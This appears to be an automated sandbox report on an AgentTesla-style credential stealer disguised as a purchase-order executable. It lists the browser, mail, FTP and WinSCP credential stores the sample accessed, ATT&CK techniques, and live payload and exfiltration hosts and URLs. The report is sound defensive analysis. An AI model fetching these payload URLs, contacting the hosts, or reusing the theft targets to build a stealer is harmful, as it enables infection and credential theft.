                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeQueries volume information: C:\Users\user\AppData\Roaming\Xpnzea.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 6.2.Xpnzea.exe.3d34a70.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.InstallUtil.exe.770000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.Xpnzea.exe.3d34a70.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000002.1652064396.0000000003D1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.1623982738.0000000000772000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2691701821.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.1629857451.00000000028CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1479691061.0000000003A03000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2691701821.00000000029FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1709180379.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1627992334.00000000030FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1709180379.000000000284F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1739735884.0000000003A2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1652064396.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1708492205.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1472676483.0000000002C6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.1629857451.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: PO_9876563647-FLOWTRONIX (FT)UUE.exe PID: 2944, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3280, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Xpnzea.exe PID: 6876, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 4836, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Xpnzea.exe PID: 4260, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3848, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txt
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                        Source: Yara matchFile source: 6.2.Xpnzea.exe.3d34a70.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.InstallUtil.exe.770000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.Xpnzea.exe.3d34a70.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000002.1652064396.0000000003D1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.1623982738.0000000000772000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1479691061.0000000003A03000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2691701821.00000000029FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1709180379.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1627992334.00000000030FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1739735884.0000000003A2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1652064396.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1708492205.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1472676483.0000000002C6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.1629857451.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: PO_9876563647-FLOWTRONIX (FT)UUE.exe PID: 2944, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3280, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Xpnzea.exe PID: 6876, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 4836, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Xpnzea.exe PID: 4260, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3848, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 6.2.Xpnzea.exe.3d34a70.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.InstallUtil.exe.770000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.Xpnzea.exe.3d34a70.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000002.1652064396.0000000003D1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.1623982738.0000000000772000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2691701821.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.1629857451.00000000028CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1479691061.0000000003A03000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2691701821.00000000029FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1709180379.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1627992334.00000000030FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1709180379.000000000284F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1739735884.0000000003A2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.1652064396.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1708492205.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1472676483.0000000002C6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.1629857451.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: PO_9876563647-FLOWTRONIX (FT)UUE.exe PID: 2944, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3280, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Xpnzea.exe PID: 6876, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 4836, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Xpnzea.exe PID: 4260, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3848, type: MEMORYSTR
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                        Windows Management Instrumentation
                        1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        1
                        Disable or Modify Tools
                        2
                        OS Credential Dumping
                        1
                        File and Directory Discovery
                        Remote Services11
                        Archive Collected Data
                        1
                        Ingress Tool Transfer
                        1
                        Exfiltration Over Alternative Protocol
                        Abuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Scheduled Task/Job
                        1
                        Scheduled Task/Job
                        311
                        Process Injection
                        1
                        Deobfuscate/Decode Files or Information
                        1
                        Credentials in Registry
                        24
                        System Information Discovery
                        Remote Desktop Protocol2
                        Data from Local System
                        11
                        Encrypted Channel
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAt1
                        Registry Run Keys / Startup Folder
                        1
                        Scheduled Task/Job
                        2
                        Obfuscated Files or Information
                        Security Account Manager311
                        Security Software Discovery
                        SMB/Windows Admin Shares1
                        Email Collection
                        1
                        Non-Standard Port
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                        Registry Run Keys / Startup Folder
                        2
                        Software Packing
                        NTDS12
                        Virtualization/Sandbox Evasion
                        Distributed Component Object ModelInput Capture2
                        Non-Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading
                        LSA Secrets1
                        Process Discovery
                        SSHKeylogging13
                        Application Layer Protocol
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Masquerading
                        Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                        Virtualization/Sandbox Evasion
                        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
                        Process Injection
                        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523145 Sample: PO_9876563647-FLOWTRONIX (F... Startdate: 01/10/2024 Architecture: WINDOWS Score: 100 30 wymascensores.com 2->30 32 ftp.alternatifplastik.com 2->32 46 Multi AV Scanner detection for domain / URL 2->46 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 11 other signatures 2->52 7 PO_9876563647-FLOWTRONIX (FT)UUE.exe 16 4 2->7         started        12 Xpnzea.exe 14 2 2->12         started        14 Xpnzea.exe 2 2->14         started        signatures3 process4 dnsIp5 34 wymascensores.com 67.212.175.162, 443, 49705, 49710 SINGLEHOP-LLCUS United States 7->34 24 C:\Users\user\AppData\Roaming\Xpnzea.exe, PE32 7->24 dropped 26 C:\Users\user\...\Xpnzea.exe:Zone.Identifier, ASCII 7->26 dropped 54 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->54 56 Writes to foreign memory regions 7->56 58 Allocates memory in foreign processes 7->58 16 InstallUtil.exe 14 2 7->16         started        60 Multi AV Scanner detection for dropped file 12->60 62 Machine Learning detection for dropped file 12->62 64 Injects a PE file into a foreign processes 12->64 20 InstallUtil.exe 2 12->20         started        22 InstallUtil.exe 14->22         started        file6 signatures7 process8 dnsIp9 28 ftp.alternatifplastik.com 5.2.84.236, 21, 49706, 49707 ALASTYRTR Turkey 16->28 36 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->36 38 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 22->38 40 Tries to steal Mail credentials (via file / registry access) 22->40 42 Tries to harvest and steal ftp login credentials 22->42 44 Tries to harvest and steal browser information (history, passwords, etc) 22->44 signatures10

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        PO_9876563647-FLOWTRONIX (FT)UUE.exe47%ReversingLabsWin32.Trojan.AgentTesla
                        PO_9876563647-FLOWTRONIX (FT)UUE.exe33%VirustotalBrowse
                        PO_9876563647-FLOWTRONIX (FT)UUE.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Roaming\Xpnzea.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\Xpnzea.exe47%ReversingLabsWin32.Trojan.AgentTesla
                        C:\Users\user\AppData\Roaming\Xpnzea.exe33%VirustotalBrowse
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        wymascensores.com3%VirustotalBrowse
                        ftp.alternatifplastik.com3%VirustotalBrowse
                        SourceDetectionScannerLabelLink
                        https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                        https://account.dyn.com/0%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                        https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                        https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                        https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                        https://github.com/mgravell/protobuf-neti0%VirustotalBrowse
                        https://wymascensores.com/servex/Evzbwt.mp34%VirustotalBrowse
                        https://wymascensores.com6%VirustotalBrowse
                        http://ftp.alternatifplastik.com3%VirustotalBrowse
                        https://github.com/mgravell/protobuf-net0%VirustotalBrowse
                        https://github.com/mgravell/protobuf-netJ0%VirustotalBrowse
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        wymascensores.com
                        67.212.175.162
                        truetrueunknown
                        ftp.alternatifplastik.com
                        5.2.84.236
                        truetrueunknown
                        NameMaliciousAntivirus DetectionReputation
                        https://wymascensores.com/servex/Evzbwt.mp3trueunknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://github.com/mgravell/protobuf-netPO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1485888080.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://github.com/mgravell/protobuf-netiPO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1485888080.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://stackoverflow.com/q/14436606/23354PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1472676483.00000000028F8000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1485888080.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000006.00000002.1627992334.0000000002C98000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1708492205.00000000028F7000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://account.dyn.com/PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003A03000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1472676483.0000000002C6C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1623982738.0000000000772000.00000040.00000400.00020000.00000000.sdmp, Xpnzea.exe, 00000006.00000002.1652064396.0000000003D1F000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000006.00000002.1627992334.00000000030FE000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000006.00000002.1652064396.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1708492205.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1739735884.0000000003A2A000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://github.com/mgravell/protobuf-netJPO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1485888080.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000006.00000002.1652064396.00000000046A6000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1739735884.0000000004306000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://wymascensores.comPO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1472676483.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000006.00000002.1627992334.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1708492205.00000000028BC000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1472676483.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1629857451.00000000028CE000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000006.00000002.1627992334.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.1709180379.000000000284F000.00000004.00000800.00020000.00000000.sdmp, Xpnzea.exe, 00000008.00000002.1708492205.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2691701821.0000000002A3E000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://stackoverflow.com/q/11564914/23354;PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1485888080.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://stackoverflow.com/q/2152978/23354PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1485888080.0000000005DB0000.00000004.08000000.00040000.00000000.sdmp, PO_9876563647-FLOWTRONIX (FT)UUE.exe, 00000000.00000002.1479691061.0000000003AAE000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://ftp.alternatifplastik.comInstallUtil.exe, 00000002.00000002.1629857451.00000000028CE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1629857451.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.1709180379.000000000285D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.1709180379.000000000284F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2691701821.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2691701821.0000000002A4C000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        67.212.175.162
                        wymascensores.comUnited States
                        32475SINGLEHOP-LLCUStrue
                        5.2.84.236
